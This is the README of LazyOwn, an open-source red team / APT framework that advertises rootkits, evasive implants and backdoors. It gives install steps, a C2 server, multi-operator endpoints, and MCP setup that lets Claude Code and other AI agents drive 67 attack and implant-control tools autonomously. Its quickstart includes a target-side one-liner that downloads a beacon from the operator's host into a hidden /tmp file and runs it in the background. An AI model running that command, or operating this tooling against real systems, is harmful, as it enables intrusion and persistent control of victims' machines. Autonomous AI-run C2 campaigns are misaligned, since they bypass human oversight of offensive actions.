Loading repository data…
Loading repository data…
grisuno / repository
LazyOwn RedTeam/APT Framework is the first RedTeam Framework with an AI-powered C&C, featuring rootkits to conceal campaigns, undetectable malleable implants compatible with Windows/Linux/Mac OSX, and self-configuring backdoors. With its Web interface and powerful Console Client, it is the best combination for your Autonomous RedTeam/APT campaigns.
██▓ ▄▄▄ ▒███████▒▓██ ██▓ ▒█████ █ █░███▄ █
▓██▒ ▒████▄ ▒ ▒ ▒ ▄▀░ ▒██ ██▒▒██▒ ██▒▓█░ █ ░█░██ ▀█ █
▒██░ ▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██ ██░▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒
▒██░ ░██▄▄▄▄██ ▄▀▒ ░ ░ ▐██▓░▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒
░██████▒▓█ ▓██▒▒███████▒ ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░ ▓██░
░ ▒░▓ ░▒▒ ▓▒█░░▒▒ ▓░▒░▒ ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒
░ ░ ▒ ░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░
░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░
LazyOwn comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under the terms of the GNU General Public License v3. See the LICENSE file for details about using this software.
LazyOwn is a professional red team framework for penetration testers and security researchers. It provides over 666 attack techniques for Linux, Unix, BSD, macOS, and Windows environments, and integrates the Atomic Red Team attack library.
New here? This is the whole on-ramp. Full walkthrough: QUICKSTART.md.
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh # virtualenv + pinned dependencies + C2 certificates
./run # launches the shell; first run offers the setup wizard
Lighter install: bash install.sh --no-ml skips the heavy torch/CUDA stack, --no-ollama skips the local LLM runtime. Dependencies are pinned in requirements.txt (cross-platform core) and requirements-ml.txt (optional ML); pyproject.toml is the single source of truth.
For isolated, reproducible engagements, see lazyown-docker/README.md.
cd lazyown-docker
./mkdocker.sh build
./mkdocker.sh run --vpn 1
Then, inside the (LazyOwn) > shell:
doctor # preflight: verifies Python, venv, packages, certs, SecLists, tools
wizard # guided config (auto-detects lhost, walks 7 steps)
ping # confirm the target is up and detect its OS
lazynmap # full port + service scan
If doctor reports a blocking failure (red), fix it before going further — it
tells you the exact pip install / apt install command for whatever is
missing. Warnings (yellow) are optional features you can ignore for now.
LazyOwn is built around a modular, command-driven architecture that provides flexibility and extensibility for security testing workflows.
LazyOwn integrates a command-line interface (CLI) built on cmd2 and a web-based GUI built on Flask. Parameters are scoped to payload.json, enabling consistent configuration across tools. The framework supports adversary simulation, task scheduling via the cron command, and persistent automated threat simulation workflows.
Connect Claude Code to the LazyOwn framework via the Model Context Protocol (MCP). The MCP server exposes 67 tools covering the full engagement lifecycle.
| File | Purpose |
|---|---|
skills/lazyown_mcp.py | MCP server — exposes 67 LazyOwn tools to Claude |
skills/lazyown.md | Claude Code skill / slash-command documentation |
skills/autonomous_daemon.py | Autonomous execution daemon (objective-driven, no Claude required between steps) |
skills/hive_mind.py | Multi-agent queen + drone system with ChromaDB memory |
skills/lazyown_policy.py | Reward-based policy engine for the auto_loop |
skills/lazyown_facts.py | Structured fact extraction from nmap XML and tool output |
skills/lazyown_parquet_db.py | Parquet knowledge base: session history, GTFOBins, LOLBas, ATT&CK |
Full guide:
QUICKSTART.md
# 1. Clone and install (add --no-ml to skip the 2 GB torch/CUDA stack, --no-ollama to skip the local LLM)
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh
# 2. Launch, verify the install, then run the wizard
./run
(LazyOwn) > doctor # preflight: Python, venv, packages, certs, SecLists, tools
(LazyOwn) > wizard # auto-detects lhost, walks 7 config steps
# Heavy optional dependencies (pycryptodome, python-libnmap, impacket, ...) are
# imported lazily: a missing package degrades only its feature instead of
# crashing the shell, and the dependent command raises a clear "pip install ..."
# error when used. To audit them without launching the shell (works even if rich
# or cmd2 are broken): python3 -m core.dependencies
# 3. Define your authorized scope, then recon
(LazyOwn) > scope add 10.10.11.0/24 && scope mode enforce
(LazyOwn) > ping && lazynmap && auto_populate && facts_show
# 4. Start C2 (separate terminal)
bash fast_run_as_r00t.sh --no-attach --vpn 1
# 5. Get a shell — Linux BOF-capable beacon
(LazyOwn) > blacksandbeacon
# Then on target: curl -sk "http://<lhost>:<lport>/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &
# 6. Invite teammates (multi-operator)
(LazyOwn) > collab_join alice
# Prints: https://<lhost>:<c2_port>/collab/?operator=alice
LazyOwn's collab layer provides real-time team server functionality via
Server-Sent Events (SSE). It activates automatically when lazyc2.py starts.
Browser dashboard — open in any browser on the team:
https://<lhost>:<c2_port>/collab/?operator=<your_handle>
Terminal SSE stream:
curl --insecure -N "https://<lhost>:<c2_port>/collab/stream?operator=alice" | jq .
Publish a finding to all operators:
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
-H "Content-Type: application/json" \
-d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'
Lock a target (prevents two operators running the same tool):
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/lock \
-H "Content-Type: application/json" \
-d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'
| Endpoint | Method | Description |
|---|---|---|
/collab/ | GET | Multi-operator browser dashboard |
/collab/stream?operator=<name> | GET (SSE) | Real-time event stream |
/collab/operators | GET | Active operator list |
/collab/publish | POST | Broadcast a structured event |
/collab/lock | POST | Acquire advisory target lock |
/collab/unlock | POST | Release target lock |
/collab/locks | GET | All active locks |
/collab/history?n=100 | GET | Last N events |
From the CLI: collab_join <handle> prints all URLs for a given operator.
LazyOwn exposes its full framework via the Model Context Protocol (MCP). The same server works with Claude Code, Claude Desktop, Hermes Agent, and OpenCode — pick the integration that matches your environment.
claude mcp add lazyown python3 /home/grisun0/LazyOwn/skills/lazyown_mcp.py
Or add manually to ~/.claude/claude_desktop_config.json:
{
"mcpServers": {
"lazyown": {
"command": "python3",
"args": ["/home/grisun0/LazyOwn/skills/lazyown_mcp.py"],
"env": {
"LAZYOWN_DIR": "/home/grisun0/LazyOwn"
}
}
}
}
Install the slash command (optional):
cp skills/lazyown.md ~/.claude/commands/lazyown.md
After restarting Claude Code, all lazyown_* tools are available.
LazyOwn is Hermes-native. The skills/hermes-lazyown/ integration layer provides a compact, namespaced tool surface optimized for Hermes context windows with checkpoint resume, dynamic rule generation, and native delegation planning.
Register in ~/.hermes/config.yaml:
mcp_servers:
hermes-lazyown:
command: python3
args: ["/home/grisun0/LazyOwn/skills/hermes-lazyown/mcp_server.py"]
env:
LAZYOWN_DIR: "/home/grisun0/LazyOwn"
Then reload MCP tools in Hermes with /reload-mcp.
See skills/hermes-lazyown/README.md for the full Hermes integration guide.
LazyOwn is OpenCode-friendly via the LazyOwnOpenCodeAdapter:
git clone https://github.com/grisuno/LazyOwnOpenCodeAdapter.git
cd LazyOwnOpenCodeAdapter && npm install
npm run build
The adapter bridges LazyOwn's MCP server into the OpenCode CLI, exposing the same lazyown_* tool surface with OpenCode-native prompts and workflows.
Full setup: https://github.com/grisuno/LazyOwnOpenCodeAdapter
| Variable | Default | Description |
|---|---|---|
LAZYOWN_DIR | parent of skills/ | LazyOwn root directory |
LAZYOWN_C2_HOST | payload.json lhost | C2 server address |
LAZYOWN_C2_PORT | payload.json c2_port | C2 server port |
LAZYOWN_C2_USER | payload.json c2_user | C2 username |
LAZYOWN_C2_PASS | payload.json c2_pass | C2 password |
| Group | Tools | Description |
|---|---|---|
| Core Execution | 7 | run_command (now with dry_run + confirm), get/set_config, list_modules, discover_commands, command_help, palette |
| Audit & Context | 6 | target_context, tasks_cleanup, evidence_grep, session_diff, run_command_async, job_status |
| Target Management | 3 | add_target, list_targets, set_active_target |
| C2 / Implant Control | 10 | c2_command, c2_status, get_beacons, run_api, c2_profile, c2_vuln_analysis, c2_redop, c2_search_agent, c2_script, c2_adversary |
| Session Awareness | 4 | session_status, session_state, list_sessions, read_session_file |
| Autonomous Loop | 3 | auto_loop, policy_status, recommend_next |
| ACI — Autonomous Campaign Intelligence | 3 | aci_plan, aci_status, aci_replan |
| Reactive Intelligence | 2 | reactive_suggest, bridge_suggest |
| Objectives & Planning | 4 | inject_objective, next_objective, soul, read_prompt |
| Knowledge Bases | 9 | parquet_query/an |